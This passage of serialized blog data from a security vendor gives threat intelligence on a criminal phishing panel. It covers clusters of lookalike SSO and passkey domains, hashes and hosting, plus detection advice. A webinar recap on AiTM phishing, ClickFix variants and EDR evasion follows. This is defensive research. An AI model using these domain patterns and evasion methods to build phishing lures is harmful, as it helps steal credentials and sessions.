leaks.",{"data":11921,"content":11922,"nodeType":4845},{},[11923,11946,11989,12011,12046,12089,12111,12133],{"data":11924,"content":11925,"nodeType":4581},{},[11926,11936],{"data":11927,"content":11928,"nodeType":4569},{},[11929],{"data":11930,"content":11931,"nodeType":860},{},[11932],{"data":11933,"marks":11934,"value":11655,"nodeType":864},{},[11935],{"type":899},{"data":11937,"content":11938,"nodeType":4569},{},[11939],{"data":11940,"content":11941,"nodeType":860},{},[11942],{"data":11943,"marks":11944,"value":11278,"nodeType":864},{},[11945],{"type":899},{"data":11947,"content":11948,"nodeType":4581},{},[11949,11958],{"data":11950,"content":11951,"nodeType":4569},{},[11952],{"data":11953,"content":11954,"nodeType":860},{},[11955],{"data":11956,"marks":11957,"value":11180,"nodeType":864},{},[],{"data":11959,"content":11960,"nodeType":4569},{},[11961,11968,11975,11982],{"data":11962,"content":11963,"nodeType":860},{},[11964],{"data":11965,"marks":11966,"value":11967,"nodeType":864},{},[],"c0df36ccf88d5c8434b13b58f7a55a9715643a126148b9d078a93075d09cad26",{"data":11969,"content":11970,"nodeType":860},{},[11971],{"data":11972,"marks":11973,"value":11974,"nodeType":864},{},[],"d178dc7108fa9344dae28e350e810352e9e874563496dc7876ee628b11b0eabb",{"data":11976,"content":11977,"nodeType":860},{},[11978],{"data":11979,"marks":11980,"value":11981,"nodeType":864},{},[],"9c0939960e49122196e44b6779fe55dd7a13ab437ce251c8cf35f8c6daf8be21",{"data":11983,"content":11984,"nodeType":860},{},[11985],{"data":11986,"marks":11987,"value":11988,"nodeType":864},{},[],"e8128b33259f7ea4313c942689ba0ba557f17b1474f2e621c62a5b77674fab86",{"data":11990,"content":11991,"nodeType":4581},{},[11992,12001],{"data":11993,"content":11994,"nodeType":4569},{},[11995],{"data":11996,"content":11997,"nodeType":860},{},[11998],{"data":11999,"marks":12000,"value":11707,"nodeType":864},{},[],{"data":12002,"content":12003,"nodeType":4569},{},[12004],{"data":12005,"content":12006,"nodeType":860},{},[12007],{"data":12008,"marks":12009,"value":12010,"nodeType":864},{},[],"January 2026",{"data":12012,"content":12013,"nodeType":4581},{},[12014,12023],{"data":12015,"content":12016,"nodeType":4569},{},[12017],{"data":12018,"content":12019,"nodeType":860},{},[12020],{"data":12021,"marks":12022,"value":11730,"nodeType":864},{},[],{"data":12024,"content":12025,"nodeType":4569},{},[12026,12033,12040],{"data":12027,"content":12028,"nodeType":860},{},[12029],{"data":12030,"marks":12031,"value":12032,"nodeType":864},{},[],"\u003Ctarget>internal.com",{"data":12034,"content":12035,"nodeType":860},{},[12036],{"data":12037,"marks":12038,"value":12039,"nodeType":864},{},[],"\u003Ctarget>sso.com",{"data":12041,"content":12042,"nodeType":860},{},[12043],{"data":12044,"marks":12045,"value":11768,"nodeType":864},{},[],{"data":12047,"content":12048,"nodeType":4581},{},[12049,12058],{"data":12050,"content":12051,"nodeType":4569},{},[12052],{"data":12053,"content":12054,"nodeType":860},{},[12055],{"data":12056,"marks":12057,"value":11781,"nodeType":864},{},[],{"data":12059,"content":12060,"nodeType":4569},{},[12061,12068,12075,12082],{"data":12062,"content":12063,"nodeType":860},{},[12064],{"data":12065,"marks":12066,"value":12067,"nodeType":864},{},[],"epicgamessso[.]com (December 2025)",{"data":12069,"content":12070,"nodeType":860},{},[12071],{"data":12072,"marks":12073,"value":12074,"nodeType":864},{},[],"myadyeninternal[.]com (January 2026)",{"data":12076,"content":12077,"nodeType":860},{},[12078],{"data":12079,"marks":12080,"value":12081,"nodeType":864},{},[],"mysonossso[.]com (January 2026)",{"data":12083,"content":12084,"nodeType":860},{},[12085],{"data":12086,"marks":12087,"value":12088,"nodeType":864},{},[],"sonosinternal[.]com (January 2026)",{"data":12090,"content":12091,"nodeType":4581},{},[12092,12101],{"data":12093,"content":12094,"nodeType":4569},{},[12095],{"data":12096,"content":12097,"nodeType":860},{},[12098],{"data":12099,"marks":12100,"value":11825,"nodeType":864},{},[],{"data":12102,"content":12103,"nodeType":4569},{},[12104],{"data":12105,"content":12106,"nodeType":860},{},[12107],{"data":12108,"marks":12109,"value":12110,"nodeType":864},{},[],"Tucows",{"data":12112,"content":12113,"nodeType":4581},{},[12114,12123],{"data":12115,"content":12116,"nodeType":4569},{},[12117],{"data":12118,"content":12119,"nodeType":860},{},[12120],{"data":12121,"marks":12122,"value":11848,"nodeType":864},{},[],{"data":12124,"content":12125,"nodeType":4569},{},[12126],{"data":12127,"content":12128,"nodeType":860},{},[12129],{"data":12130,"marks":12131,"value":12132,"nodeType":864},{},[],"Njalla",{"data":12134,"content":12135,"nodeType":4581},{},[12136,12145],{"data":12137,"content":12138,"nodeType":4569},{},[12139],{"data":12140,"content":12141,"nodeType":860},{},[12142],{"data":12143,"marks":12144,"value":11871,"nodeType":864},{},[],{"data":12146,"content":12147,"nodeType":4569},{},[12148],{"data":12149,"content":12150,"nodeType":860},{},[12151],{"data":12152,"marks":12153,"value":12154,"nodeType":864},{},[],"Njalla (AS39287)",{"data":12156,"content":12157,"nodeType":1312},{},[12158],{"data":12159,"marks":12160,"value":12161,"nodeType":864},{},[],"Cluster C",{"data":12163,"content":12164,"nodeType":860},{},[12165],{"data":12166,"marks":12167,"value":12168,"nodeType":864},{},[],"Cluster C is likely an evolution of Cluster B. Some evidence has been observed tying the backend hosting to Njalla behind the Cloudflare CDN further solidifying the link. The shift to Cloudflare Turnstile protection and subdomain-based targeting represents an operational refinement — moving away from the distinctive [target]internal[.]com pattern that had become a well-known campaign indicator.",{"data":12170,"content":12171,"nodeType":4845},{},[12172,12196,12218,12240,12262,12305,12326,12348],{"data":12173,"content":12174,"nodeType":4581},{},[12175,12185],{"data":12176,"content":12177,"nodeType":4569},{},[12178],{"data":12179,"content":12180,"nodeType":860},{},[12181],{"data":12182,"marks":12183,"value":11655,"nodeType":864},{},[12184],{"type":899},{"data":12186,"content":12187,"nodeType":4569},{},[12188],{"data":12189,"content":12190,"nodeType":860},{},[12191],{"data":12192,"marks":12193,"value":12195,"nodeType":864},{},[12194],{"type":899},"heartbeat/check_redirect variant protected with Cloudflare turnstile",{"data":12197,"content":12198,"nodeType":4581},{},[12199,12208],{"data":12200,"content":12201,"nodeType":4569},{},[12202],{"data":12203,"content":12204,"nodeType":860},{},[12205],{"data":12206,"marks":12207,"value":11180,"nodeType":864},{},[],{"data":12209,"content":12210,"nodeType":4569},{},[12211],{"data":12212,"content":12213,"nodeType":860},{},[12214],{"data":12215,"marks":12216,"value":12217,"nodeType":864},{},[],"cb1d409278b2247af23e7b00ac779b232baaf4ce5f63fdf5ebc3920a38cc6102",{"data":12219,"content":12220,"nodeType":4581},{},[12221,12230],{"data":12222,"content":12223,"nodeType":4569},{},[12224],{"data":12225,"content":12226,"nodeType":860},{},[12227],{"data":12228,"marks":12229,"value":11707,"nodeType":864},{},[],{"data":12231,"content":12232,"nodeType":4569},{},[12233],{"data":12234,"content":12235,"nodeType":860},{},[12236],{"data":12237,"marks":12238,"value":12239,"nodeType":864},{},[],"March 2026 - present (April 2026)",{"data":12241,"content":12242,"nodeType":4581},{},[12243,12252],{"data":12244,"content":12245,"nodeType":4569},{},[12246],{"data":12247,"content":12248,"nodeType":860},{},[12249],{"data":12250,"marks":12251,"value":11730,"nodeType":864},{},[],{"data":12253,"content":12254,"nodeType":4569},{},[12255],{"data":12256,"content":12257,"nodeType":860},{},[12258],{"data":12259,"marks":12260,"value":12261,"nodeType":864},{},[],"\u003Ctarget> subdomain with generic “sso”, “passkey”, “enroll”, “okta” theme root domain",{"data":12263,"content":12264,"nodeType":4581},{},[12265,12274],{"data":12266,"content":12267,"nodeType":4569},{},[12268],{"data":12269,"content":12270,"nodeType":860},{},[12271],{"data":12272,"marks":12273,"value":11781,"nodeType":864},{},[],{"data":12275,"content":12276,"nodeType":4569},{},[12277,12284,12291,12298],{"data":12278,"content":12279,"nodeType":860},{},[12280],{"data":12281,"marks":12282,"value":12283,"nodeType":864},{},[],"\u003Ctarget>.passkeysetup.com (March 2026)",{"data":12285,"content":12286,"nodeType":860},{},[12287],{"data":12288,"marks":12289,"value":12290,"nodeType":864},{},[],"\u003Ctarget>.enrollms.com (March 2026)",{"data":12292,"content":12293,"nodeType":860},{},[12294],{"data":12295,"marks":12296,"value":12297,"nodeType":864},{},[],"\u003Ctarget>.keyokta.com (April 2026)",{"data":12299,"content":12300,"nodeType":860},{},[12301],{"data":12302,"marks":12303,"value":12304,"nodeType":864},{},[],"\u003Ctarget>.passkeywork.com (April 2026)",{"data":12306,"content":12307,"nodeType":4581},{},[12308,12317],{"data":12309,"content":12310,"nodeType":4569},{},[12311],{"data":12312,"content":12313,"nodeType":860},{},[12314],{"data":12315,"marks":12316,"value":11825,"nodeType":864},{},[],{"data":12318,"content":12319,"nodeType":4569},{},[12320],{"data":12321,"content":12322,"nodeType":860},{},[12323],{"data":12324,"marks":12325,"value":12110,"nodeType":864},{},[],{"data":12327,"content":12328,"nodeType":4581},{},[12329,12338],{"data":12330,"content":12331,"nodeType":4569},{},[12332],{"data":12333,"content":12334,"nodeType":860},{},[12335],{"data":12336,"marks":12337,"value":11848,"nodeType":864},{},[],{"data":12339,"content":12340,"nodeType":4569},{},[12341],{"data":12342,"content":12343,"nodeType":860},{},[12344],{"data":12345,"marks":12346,"value":12347,"nodeType":864},{},[],"Cloudflare",{"data":12349,"content":12350,"nodeType":4581},{},[12351,12360],{"data":12352,"content":12353,"nodeType":4569},{},[12354],{"data":12355,"content":12356,"nodeType":860},{},[12357],{"data":12358,"marks":12359,"value":11871,"nodeType":864},{},[],{"data":12361,"content":12362,"nodeType":4569},{},[12363],{"data":12364,"content":12365,"nodeType":860},{},[12366],{"data":12367,"marks":12368,"value":12369,"nodeType":864},{},[],"Cloudflare (AS13335)",{"data":12371,"content":12372,"nodeType":1312},{},[12373],{"data":12374,"marks":12375,"value":12376,"nodeType":864},{},[],"Cluster D",{"data":12378,"content":12379,"nodeType":4845},{},[12380,12404,12426,12448,12470,12499,12520,12541],{"data":12381,"content":12382,"nodeType":4581},{},[12383,12393],{"data":12384,"content":12385,"nodeType":4569},{},[12386],{"data":12387,"content":12388,"nodeType":860},{},[12389],{"data":12390,"marks":12391,"value":11655,"nodeType":864},{},[12392],{"type":899},{"data":12394,"content":12395,"nodeType":4569},{},[12396],{"data":12397,"content":12398,"nodeType":860},{},[12399],{"data":12400,"marks":12401,"value":12403,"nodeType":864},{},[12402],{"type":899},"heartbeat/check_redirect variant (minified)",{"data":12405,"content":12406,"nodeType":4581},{},[12407,12416],{"data":12408,"content":12409,"nodeType":4569},{},[12410],{"data":12411,"content":12412,"nodeType":860},{},[12413],{"data":12414,"marks":12415,"value":11180,"nodeType":864},{},[],{"data":12417,"content":12418,"nodeType":4569},{},[12419],{"data":12420,"content":12421,"nodeType":860},{},[12422],{"data":12423,"marks":12424,"value":12425,"nodeType":864},{},[],"9d65dd34384b441505e6b67647153c02d5c367bb53da36ce36a392e70b37940a",{"data":12427,"content":12428,"nodeType":4581},{},[12429,12438],{"data":12430,"content":12431,"nodeType":4569},{},[12432],{"data":12433,"content":12434,"nodeType":860},{},[12435],{"data":12436,"marks":12437,"value":11707,"nodeType":864},{},[],{"data":12439,"content":12440,"nodeType":4569},{},[12441],{"data":12442,"content":12443,"nodeType":860},{},[12444],{"data":12445,"marks":12446,"value":12447,"nodeType":864},{},[],"April 2026 (low volume)",{"data":12449,"content":12450,"nodeType":4581},{},[12451,12460],{"data":12452,"content":12453,"nodeType":4569},{},[12454],{"data":12455,"content":12456,"nodeType":860},{},[12457],{"data":12458,"marks":12459,"value":11730,"nodeType":864},{},[],{"data":12461,"content":12462,"nodeType":4569},{},[12463],{"data":12464,"content":12465,"nodeType":860},{},[12466],{"data":12467,"marks":12468,"value":12469,"nodeType":864},{},[],"\u003Ctarget> subdomain with generic “passkey”, “portal”, “okta” theme root domain",{"data":12471,"content":12472,"nodeType":4581},{},[12473,12482],{"data":12474,"content":12475,"nodeType":4569},{},[12476],{"data":12477,"content":12478,"nodeType":860},{},[12479],{"data":12480,"marks":12481,"value":11781,"nodeType":864},{},[],{"data":12483,"content":12484,"nodeType":4569},{},[12485,12492],{"data":12486,"content":12487,"nodeType":860},{},[12488],{"data":12489,"marks":12490,"value":12491,"nodeType":864},{},[],"\u003Ctarget>.passkeyportalsetup.com",{"data":12493,"content":12494,"nodeType":860},{},[12495],{"data":12496,"marks":12497,"value":12498,"nodeType":864},{},[],"\u003Ctarget>.addoktapasskey.com",{"data":12500,"content":12501,"nodeType":4581},{},[12502,12511],{"data":12503,"content":12504,"nodeType":4569},{},[12505],{"data":12506,"content":12507,"nodeType":860},{},[12508],{"data":12509,"marks":12510,"value":11825,"nodeType":864},{},[],{"data":12512,"content":12513,"nodeType":4569},{},[12514],{"data":12515,"content":12516,"nodeType":860},{},[12517],{"data":12518,"marks":12519,"value":11835,"nodeType":864},{},[],{"data":12521,"content":12522,"nodeType":4581},{},[12523,12532],{"data":12524,"content":12525,"nodeType":4569},{},[12526],{"data":12527,"content":12528,"nodeType":860},{},[12529],{"data":12530,"marks":12531,"value":11848,"nodeType":864},{},[],{"data":12533,"content":12534,"nodeType":4569},{},[12535],{"data":12536,"content":12537,"nodeType":860},{},[12538],{"data":12539,"marks":12540,"value":12347,"nodeType":864},{},[],{"data":12542,"content":12543,"nodeType":4581},{},[12544,12553],{"data":12545,"content":12546,"nodeType":4569},{},[12547],{"data":12548,"content":12549,"nodeType":860},{},[12550],{"data":12551,"marks":12552,"value":11871,"nodeType":864},{},[],{"data":12554,"content":12555,"nodeType":4569},{},[12556],{"data":12557,"content":12558,"nodeType":860},{},[12559],{"data":12560,"marks":12561,"value":12369,"nodeType":864},{},[],{"data":12563,"content":12564,"nodeType":1005},{},[],{"data":12566,"content":12567,"nodeType":1009},{},[12568],{"data":12569,"marks":12570,"value":12572,"nodeType":864},{},[12571],{"type":899},"Detection considerations",{"data":12574,"content":12575,"nodeType":860},{},[12576],{"data":12577,"marks":12578,"value":12579,"nodeType":864},{},[],"For Push, the detection approach to these panels is fundamentally the same as for any other phishing kit — behavioral analysis of the rendered page in the browser, regardless of the C2 protocol running underneath. ",{"data":12581,"content":12582,"nodeType":860},{},[12583],{"data":12584,"marks":12585,"value":12586,"nodeType":864},{},[],"The main operational difference is on the operator end, where the human-in-the-loop interaction replaces fully automated credential harvesting. This has implications for defenders relying on proactive infrastructure scanning: the gated landing pages, anti-bot checks, and operator-approval requirements mean the malicious content is only served to active targets, making it significantly harder for automated scanners to discover and flag these domains before they're used against a victim.",{"data":12588,"content":12589,"nodeType":860},{},[12590,12595],{"data":12591,"marks":12592,"value":12594,"nodeType":864},{},[12593],{"type":899},"The phone call as delivery vector eliminates the email-based detection surface that most organizations rely on as their primary phishing defense. ",{"data":12596,"marks":12597,"value":12598,"nodeType":864},{},[],"Operator-gated payload delivery further reduces the likelihood that these sites will be flagged as malicious and added to known-bad detection lists (and in any case, it’s trivial for attackers to spin up new ones). This reinforces the need for browser-based detection at the point the user interacts with the page, analyzing it in real time for malicious content without relying on static IoCs. ",{"data":12600,"content":12601,"nodeType":1005},{},[],{"data":12603,"content":12604,"nodeType":1009},{},[12605],{"data":12606,"marks":12607,"value":7238,"nodeType":864},{},[12608],{"type":899},{"data":12610,"content":12611,"nodeType":860},{},[12612,12616,12622],{"data":12613,"marks":12614,"value":12615,"nodeType":864},{},[],"Short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",{"data":12617,"content":12618,"nodeType":883},{"uri":7248},[12619],{"data":12620,"marks":12621,"value":7253,"nodeType":864},{},[],{"data":12623,"marks":12624,"value":12625,"nodeType":864},{},[]," in the attack chain, often dynamically serving different URLs to site visitors. ",{"data":12627,"content":12628,"nodeType":860},{},[12629,12632,12640],{"data":12630,"marks":12631,"value":21,"nodeType":864},{},[],{"data":12633,"content":12635,"nodeType":883},{"uri":12634},"https://www.virustotal.com/gui/collection/0f745e9da6ef7664444594a7ee930cfe5a9d8bd6c2f039dcde818599b8926610",[12636],{"data":12637,"marks":12638,"value":12639,"nodeType":864},{},[],"The full list of IoCs is on VirusTotal here. ",{"data":12641,"marks":12642,"value":21,"nodeType":864},{},[],{"data":12644,"content":12645,"nodeType":860},{},[12646],{"data":12647,"marks":12648,"value":7196,"nodeType":864},{},[12649],{"type":899},{"data":12651,"content":12652,"nodeType":1005},{},[],{"data":12654,"content":12655,"nodeType":1009},{},[12656],{"data":12657,"marks":12658,"value":3578,"nodeType":864},{},[12659],{"type":899},{"data":12661,"content":12662,"nodeType":860},{},[12663,12667,12673],{"data":12664,"marks":12665,"value":12666,"nodeType":864},{},[],"Push Security is the most powerful AI-native security tool in the browser. Think EDR, but for the browser — high-fidelity telemetry and real-time control across every session, on every device, with no browser migration required.\n\nSecurity teams use Push to detect and stop advanced browser-based attacks like AiTM phishing, ClickFix, and session hijacking; gain visibility and control over AI tool usage across their workforce; harden identities by surfacing credential reuse, SSO gaps, and shadow IT; and support data loss and insider investigations with browser-layer telemetry that other tools can't see.\n\nBook a ",{"data":12668,"content":12669,"nodeType":883},{"uri":1700},[12670],{"data":12671,"marks":12672,"value":2715,"nodeType":864},{},[],{"data":12674,"marks":12675,"value":2719,"nodeType":864},{},[],"We infiltrated a criminal phishing panel: here’s what we found","We got an inside look at a phishing panel used in criminal campaigns linked to operators like ShinyHunters and BlackFile. Here’s what we found.","2026-05-07T00:00:00.000Z","inside-criminal-phishing-panel",{"items":12681},[12682,12684],{"sys":12683,"name":6593},{"id":6592},{"sys":12685,"name":342},{"id":6596},{"items":12687},[12688],{"fullName":12689,"firstName":12690,"jobTitle":2738,"profilePicture":12691},"Push Security Research Team","Research",{"url":12692},"https://images.ctfassets.net/y1cdw1ablpvd/7LpkwyXbOZ8WCVTAXzULmC/bfa3634c78ee9dfbee6606ba5519918b/push-round.png","blog/llmshare-malvertising-campaign",{"json":12695},{"data":12696,"content":12697,"nodeType":856},{},[12698],{"data":12699,"content":12700,"nodeType":860},{},[12701],{"data":12702,"marks":12703,"value":12704,"nodeType":864},{},[],"Attackers are abusing the shared content features of AI chatbot platforms — ChatGPT and Claude — to deliver malware through pages hosted on legitimate, trusted domains, distributing the malicious links via sponsored malvertising ads on search engines. ",{"id":6603,"publishedAt":12706},"2026-08-12T12:00:49.899Z",{"items":12708},[12709,12711],{"sys":12710,"name":6593},{"id":6592},{"sys":12712,"name":342},{"id":6596},{"items":12714},[12715,12717,12719,12721,12723,12725,12727,12729,12731,12733,12735,12737],{"sys":12716,"name":279,"slug":280,"tier":31},{"id":276},{"sys":12718,"name":235,"slug":236,"tier":31},{"id":232},{"sys":12720,"name":519,"slug":520,"tier":31},{"id":516},{"sys":12722,"name":440,"slug":441,"tier":45},{"id":437},{"sys":12724,"name":448,"slug":449,"tier":45},{"id":445},{"sys":12726,"name":315,"slug":316,"tier":45},{"id":312},{"sys":12728,"name":431,"slug":432,"tier":45},{"id":428},{"sys":12730,"name":422,"slug":423,"tier":45},{"id":419},{"sys":12732,"name":244,"slug":245,"tier":45},{"id":241},{"sys":12734,"name":563,"slug":564,"tier":45},{"id":560},{"sys":12736,"name":607,"slug":608,"tier":45},{"id":604},{"sys":12738,"name":475,"slug":476,"tier":45},{"id":472},"IqK0SBDuAwVjeXZ7slErmV4yVzN_7gBWkRubjc6cQw4",{"id":12741,"title":12742,"authorsCollection":12743,"content":12751,"extension":228,"faqItemsCollection":13345,"faqTitle":59,"featured":6,"hashTags":59,"meta":13347,"metaTitle":13348,"ogImage":59,"postType":13349,"publishedDate":13350,"relatedBlogPostsCollection":13351,"slug":18058,"stem":18059,"subtitle":59,"summary":18060,"synopsis":18071,"sys":18072,"tagsCollection":18075,"topicsCollection":18081,"__hash__":18127},"blog/blog/7-things-we-learned-from-john-hammond.json","7 things we learned from ‘Why the browser is the new battleground’ with John Hammond",{"items":12744},[12745],{"fullName":12746,"firstName":12747,"jobTitle":12748,"socialLinks":59,"profilePicture":12749},"Daniel Park","Daniel","Technical Content",{"url":12750},"https://images.ctfassets.net/y1cdw1ablpvd/6Cwg1xVeCdzUvxBIMfnDO5/6b18ed126b53611e7b521da34f900d29/254-0-2.jpg",{"json":12752,"links":13336},{"data":12753,"content":12754,"nodeType":856},{},[12755,12775,12781,12784,12792,12843,12853,12856,12864,12883,12890,12913,12932,12935,12943,12962,12969,12976,12986,12989,12997,13029,13047,13050,13058,13075,13082,13089,13092,13100,13117,13124,13142,13152,13159,13162,13170,13187,13194,13201,13213,13223,13240,13243,13251,13258,13306],{"data":12756,"content":12757,"nodeType":860},{},[12758,12762,12771],{"data":12759,"marks":12760,"value":12761,"nodeType":864},{},[],"We recently sat down with ",{"data":12763,"content":12765,"nodeType":883},{"uri":12764},"https://www.youtube.com/@_JohnHammond",[12766],{"data":12767,"marks":12768,"value":12770,"nodeType":864},{},[12769],{"type":1455},"John Hammond",{"data":12772,"marks":12773,"value":12774,"nodeType":864},{},[]," — Senior Principal Security Researcher at Huntress — for a live deep-dive into the browser-based attack techniques defining the 2026 threat landscape. The session covered AiTM phishing, ClickFix, ConsentFix, device code phishing, and the structural shifts making traditional security controls less effective against all of them. Here are seven takeaways.",{"data":12776,"content":12780,"nodeType":996},{"target":12777},{"sys":12778},{"id":12779,"type":1001,"linkType":1002},"5lJ49aLY0nApDeY69tNvUi",[],{"data":12782,"content":12783,"nodeType":1005},{},[],{"data":12785,"content":12786,"nodeType":1009},{},[12787],{"data":12788,"marks":12789,"value":12791,"nodeType":864},{},[12790],{"type":899},"1. Browser attacks are evolving faster than defenses can adapt",{"data":12793,"content":12794,"nodeType":860},{},[12795,12799,12806,12810,12818,12822,12829,12833,12840],{"data":12796,"marks":12797,"value":12798,"nodeType":864},{},[],"The overriding theme of the session wasn't any single technique — it was the pace of change across all of them. AiTM phishing has been ",{"data":12800,"content":12801,"nodeType":883},{"uri":5914},[12802],{"data":12803,"marks":12804,"value":12805,"nodeType":864},{},[],"the dominant phishing technique",{"data":12807,"marks":12808,"value":12809,"nodeType":864},{},[]," for a couple of years now, but the variants layered on top of it are arriving faster than most security teams can evaluate, let alone deploy defenses against. ClickFix went from novel to ",{"data":12811,"content":12813,"nodeType":883},{"uri":12812},"https://pushsecurity.com/blog/introducing-the-browser-and-identity-attacks-matrix/",[12814],{"data":12815,"marks":12816,"value":12817,"nodeType":864},{},[],"the most common initial access vector observed by Microsoft",{"data":12819,"marks":12820,"value":12821,"nodeType":864},{},[]," within about a year. Device code phishing went from near-zero to ",{"data":12823,"content":12824,"nodeType":883},{"uri":3259},[12825],{"data":12826,"marks":12827,"value":12828,"nodeType":864},{},[],"at least 12 distinct kits",{"data":12830,"marks":12831,"value":12832,"nodeType":864},{},[]," in a matter of months. ConsentFix was detected as a zero-day technique by Push in late 2025 and has already been ",{"data":12834,"content":12835,"nodeType":883},{"uri":6075},[12836],{"data":12837,"marks":12838,"value":12839,"nodeType":864},{},[],"operationalized on criminal forums",{"data":12841,"marks":12842,"value":2924,"nodeType":864},{},[],{"data":12844,"content":12845,"nodeType":1116},{},[12846],{"data":12847,"content":12848,"nodeType":860},{},[12849],{"data":12850,"marks":12851,"value":12852,"nodeType":864},{},[],"As Luke put it toward the end of the session: \"I've seen this develop so fast over the last two years. This isn't what's coming — this is now. This is where the battleground is.\"",{"data":12854,"content":12855,"nodeType":1005},{},[],{"data":12857,"content":12858,"nodeType":1009},{},[12859],{"data":12860,"marks":12861,"value":12863,"nodeType":864},{},[12862],{"type":899},"2. AiTM phishing is table stakes for attackers ",{"data":12865,"content":12866,"nodeType":860},{},[12867,12871,12879],{"data":12868,"marks":12869,"value":12870,"nodeType":864},{},[],"Adversary-in-the-middle phishing — where a reverse proxy sits between the victim and the real login page, intercepting session tokens in real time to bypass MFA — is no longer an advanced technique. It's available as a commodity for-hire through Phishing-as-a-Service platforms like Tycoon2FA, Sneaky2FA, and others",{"data":12872,"content":12873,"nodeType":883},{"uri":5914},[12874],{"data":12875,"marks":12876,"value":12878,"nodeType":864},{},[12877],{"type":1455},",",{"data":12880,"marks":12881,"value":12882,"nodeType":864},{},[]," and the kits are getting harder to detect through traditional means.",{"data":12884,"content":12885,"nodeType":860},{},[12886],{"data":12887,"marks":12888,"value":12889,"nodeType":864},{},[],"Luke demoed the attacker's perspective using Evilginx — an open-source tool now commonly seen in criminal operations — showing how session tokens are captured in real time even when the victim enters their MFA code correctly. From the victim's side, the login feels completely normal.",{"data":12891,"content":12892,"nodeType":860},{},[12893,12898,12902,12910],{"data":12894,"marks":12895,"value":12897,"nodeType":864},{},[12896],{"type":899},"One of the key focuses in the session was how attackers are abusing legitimate infrastructure for both hosting and delivery of phishing pages. .",{"data":12899,"marks":12900,"value":12901,"nodeType":864},{},[]," The in-the-wild examples showed attack chains routing through multiple legitimate services — file-sharing platforms, TinyURL, Cloudflare Turnstile, Google Search redirects — before finally landing on the phishing page. This is a well established technique for ",{"data":12903,"content":12904,"nodeType":883},{"uri":7124},[12905],{"data":12906,"marks":12907,"value":12909,"nodeType":864},{},[12908],{"type":1455},"detection evasion",{"data":12911,"marks":12912,"value":10094,"nodeType":864},{},[],{"data":12914,"content":12915,"nodeType":860},{},[12916,12920,12928],{"data":12917,"marks":12918,"value":12919,"nodeType":864},{},[],"As John observed, \"the end user doesn't have that wherewithal or that observability understanding of how far they drove around across the internet\" before arriving at the credential-harvesting page. Push reconstructs these multi-hop chains into a ",{"data":12921,"content":12923,"nodeType":883},{"uri":12922},"https://pushsecurity.com/blog/guide-how-to-use-push-controls-to-protect-your-users-from-modern-attacks/",[12924],{"data":12925,"marks":12926,"value":12927,"nodeType":864},{},[],"complete timeline",{"data":12929,"marks":12930,"value":12931,"nodeType":864},{},[],", mapping the full redirect sequence even when individual hops are through trusted domains that wouldn't trigger any reputation-based alert — and crucially, detects malicious content on the phishing page itself rather than relying on known-bad IP and domain based checks that can only see the known-good sites used early in the chain.",{"data":12933,"content":12934,"nodeType":1005},{},[],{"data":12936,"content":12937,"nodeType":1009},{},[12938],{"data":12939,"marks":12940,"value":12942,"nodeType":864},{},[12941],{"type":899},"3. Email is losing its market share as a delivery vector",{"data":12944,"content":12945,"nodeType":860},{},[12946,12950,12958],{"data":12947,"marks":12948,"value":12949,"nodeType":864},{},[],"One of the most striking examples in the webinar was a targeted AiTM campaign ",{"data":12951,"content":12953,"nodeType":883},{"uri":12952},"https://pushsecurity.com/blog/new-phishing-campaign-identified-targeting-linkedin-users/",[12954],{"data":12955,"marks":12956,"value":12957,"nodeType":864},{},[],"Push detected last year",{"data":12959,"marks":12960,"value":12961,"nodeType":864},{},[]," that was delivered entirely via LinkedIn. Senior executives at tech companies received direct messages from compromised contacts — people they already knew, in some cases other employees of the same companies — offering involvement in private equity fundraising rounds connected to companies they had real involvement with. The targeting was precise and personal, and the redirect chain ran through sites.google.com and Microsoft Dynamics before landing on a cloned login page.",{"data":12963,"content":12964,"nodeType":860},{},[12965],{"data":12966,"marks":12967,"value":12968,"nodeType":864},{},[],"As Luke noted, LinkedIn occupies an unusual middle ground: \"It's this great way of targeting companies, but through a vector that can't really be monitored in the same way as other corporate systems, because it's kind of a personal platform.\" It's personal enough that companies can't realistically monitor it, but professional enough that employees routinely access it from corporate devices.",{"data":12970,"content":12971,"nodeType":860},{},[12972],{"data":12973,"marks":12974,"value":12975,"nodeType":864},{},[],"LinkedIn is only part of the shift. ClickFix attacks most commonly arrive via search results in 4 of 5 cases based on Push data. Luke noted \"not even malvertising, just organic search, uncovering legit websites that have been compromised.\" InstallFix pages appear as sponsored Google ads. ConsentFix pages were seeded on compromised websites found through normal browsing. In every case, the email gateway never sees the lure because the lure was never in an email. And of course, even if a compromised website is reported and removed, it’s easier than ever for an attacker to quickly tear down and rotate their sites to stay ahead of blocklists. ",{"data":12977,"content":12978,"nodeType":1116},{},[12979],{"data":12980,"content":12981,"nodeType":860},{},[12982],{"data":12983,"marks":12984,"value":12985,"nodeType":864},{},[],"As John put it: \"You could set up this lure or this trap out on the open internet so that anyone could fall for it at any point.\"",{"data":12987,"content":12988,"nodeType":1005},{},[],{"data":12990,"content":12991,"nodeType":1009},{},[12992],{"data":12993,"marks":12994,"value":12996,"nodeType":864},{},[12995],{"type":899},"4. ClickFix keeps evolving with multiple *Fix derivatives",{"data":12998,"content":12999,"nodeType":860},{},[13000,13004,13013,13017,13025],{"data":13001,"marks":13002,"value":13003,"nodeType":864},{},[],"ClickFix — where a malicious page silently writes a payload to the victim's clipboard and instructs them to paste and execute it — ",{"data":13005,"content":13007,"nodeType":883},{"uri":13006},"https://pushsecurity.com/blog/introducing-malicious-copy-paste-detection/",[13008],{"data":13009,"marks":13010,"value":13012,"nodeType":864},{},[13011],{"type":1455},"spawned an entire family of variants since its emergence, according to Push’s research",{"data":13014,"marks":13015,"value":13016,"nodeType":864},{},[],". The webinar showed how far the social engineering has come: Luke demonstrated a ",{"data":13018,"content":13020,"nodeType":883},{"uri":13019},"https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/",[13021],{"data":13022,"marks":13023,"value":13024,"nodeType":864},{},[],"particularly sophisticated variant",{"data":13026,"marks":13027,"value":13028,"nodeType":864},{},[]," on a compromised legitimate website with an embedded instructional video and a countdown timer to manufacture urgency, targeting macOS. As John noted: \"It can be cross-platform because you're just preying on the human weakness. The video smooths it over for the user experience.\"",{"data":13030,"content":13031,"nodeType":860},{},[13032,13036,13043],{"data":13033,"marks":13034,"value":13035,"nodeType":864},{},[],"The more important point was structural. Because the user manually pastes and executes the command, \"from the EDR's perspective, the user just manually ran this command,\" Luke explained. \"It actually breaks that link from an EDR's perspective.\" EDR behavioral detections weigh execution context heavily — a PowerShell command spawned from a browser process tree is suspicious, but the same command initiated through the Run dialog looks like normal activity. Push 